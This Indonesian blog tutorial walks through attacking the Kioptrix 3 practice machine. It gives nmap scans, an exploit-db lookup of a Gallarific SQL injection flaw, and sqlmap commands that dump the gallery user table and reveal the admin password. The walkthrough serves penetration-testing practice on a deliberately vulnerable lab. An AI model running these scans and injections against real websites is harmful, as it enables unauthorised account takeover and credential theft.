Tutorial kali ini, saya akan menjelaskan tentang mendapatkan user name dan password pada sebuah website. Sebenarnya ngga konsen bikin tutorial ini, karena hari ini sedikit mengecewakan, dengan beberapa orang yang mengecewakan. Tapi setelah mandi, kepikiran untuk meneruskan karya-karya saya di dunia peretasan.
Ok, langsung saja ke tutorial.
Preparation:
Nmap (bisa di dapatkan di sini)
Internet browser (kali ini saya menggunakan chromium)
Exploit db (bisa ditemukan di sini)
SQLmap (bisa didapatkan di sini )
Tetapkan target (kali ini target adalah kioptrix3.com
Catatan:
Semua tools ini bisa di dapatkan di <<back|track 5
Untuk internet browser, kamu bisa menggunakan browser apapun.
Dalam tutorial ini saya menggunakan OS <<back|track 5 GNOME 32 BIT
Briefing:
Mapping Local Area Network
Cari tau url halaman login
Gunakan Exploit-db untuk mencari vulnerability website tersebut
Gunakan SQLmap untuk melakukan proses SQL injection
Game over
Walkthrough:
1. Mapping Local Area Network
Buka terminal, kemudian masukan perintah:
root@red-dragon:~# nmap -sn 192.168.1.0/24
Selasa, 06 Desember 2011
Gaining User Password
root@red-dragon:~# nmap -A 192.168.1.7
2. Cari tau url halaman login
Buka browser, kemudian tuju kioptrix3.com
Kemudian arahkan browser menuju kioptrix3.com/gallery/
Mari kita coba, apakah halaman ini tersedia jika saya menambahkan "gadmin" (tanpa tanda petik).
Walaaaaa.. Saya berhasil mendapatkan halaman Log-In =)
3. Gunakan Exploit-db untuk mencari vulnerability website tersebut
Terlihat bahwa korban menggunakan Gallarific sebagai gallery managernya. Mari kita cari tau vulnerability yang dimiliki oleh gallarific.
Buka terminal, lalu masukan perintah:
root@red-dragon:~# cd /pentest/exploits/exploitdb/
kemudian
root@red-dragon:/pentest/exploits/exploitdb# grep -i gallarific files.csv
Ada 3 vulnerability yang dimikili oleh gallarific, kita akan mengambil fulnerability yang ke tiga. Yaitu "GALLARIFIC PHP Photo Gallery Script (gallery.php) SQL Injection". Masukan perintah:
root@red-dragon:/pentest/exploits/exploitdb# cat platforms/php/webapps/15891.txt
Terlihat bahwa target kita memiliki kelemahan pada url www.site.com/gallery.php?id=null
4. Gunakan SQLmap untuk melakukan proses SQL injection
Setelah mengetahui kelemahan target, sekarang saatnya melakukan SQL injection. Untuk mempercepat proses SQL ijection, saya menggunakan tools SQLmap yang sudah tersedia di <<back|track 5.
Buka terminal, lalu ketik:
root@red-dragon:/pentest/exploits/exploitdb# cd /pentest/database/sqlmap/
Penggunaan SQLmap tergolong mudah, formatnya adalah
root@red-dragon:/pentest/database/sqlmap# python sqlmap.py -u [vulnerable url]
Pada tahap 3 tiga sudah mengetahui letak vulnerable url korban kita terdapat pada /gallery.php?id=null. Maka kita hanya perlu menambahkan kioptrix3.com/gallery sebelum /gallery.php?id=null. Maka perintah sqlmap adalah:
root@red-dragon
:/
pentest/database/sqlmap# python sqlmap.py -u kioptrix3.com/gallery/gallery.php?id=null
Pada SQL injection ini, saya akan mencoba membongkar database target. Maka perintah sqlmap adalah:
root@red-dragon
:
/pentest/database/sqlmap# python sqlmap.py -ukioptrix3.com/gallery/gallery.php?id=null --dbs
Output:
Ada 3 database di sini:
gallery
information_schema
mysql
Saya akan menggunakan database gallery, dan mencoba mencari tau tabel apa saja yang ada pada database gallery. Maka perintah sqlmap adalah:
root@red-dragon:/pentest/database/sqlmap# python sqlmap.py -u kioptrix3.com/gallery/gallery.php?id=null -D gallery --table
Ada 7 table yang terdapat pada database gallery:
dev_accounts
gallarific_comments
gallarific_galleries
gallarific_photos
gallarific_settings
gallarific_stat
gallarific_users
Kemudian saya mencoba membongkar isi table pada gallarific_users. Maka perintah sqlmap adalah:
root@red-dragon:/pentest/database/sqlmap# python sqlmap.py -u kioptrix3.com/gallery/gallery.php?id=null -D gallery -T gallarific_users --dump
Banzaaaaaaaaai \(^o^)/
Kita sudak dapat user name dan password. Sekarang coba kita test. Dengan user name = admin, password = n0t7t1k4
Sekarang saya bisa melakukan apapun dengan website ini
Langganan:
Posting Komentar (Atom)
0 komentar:
Posting Komentar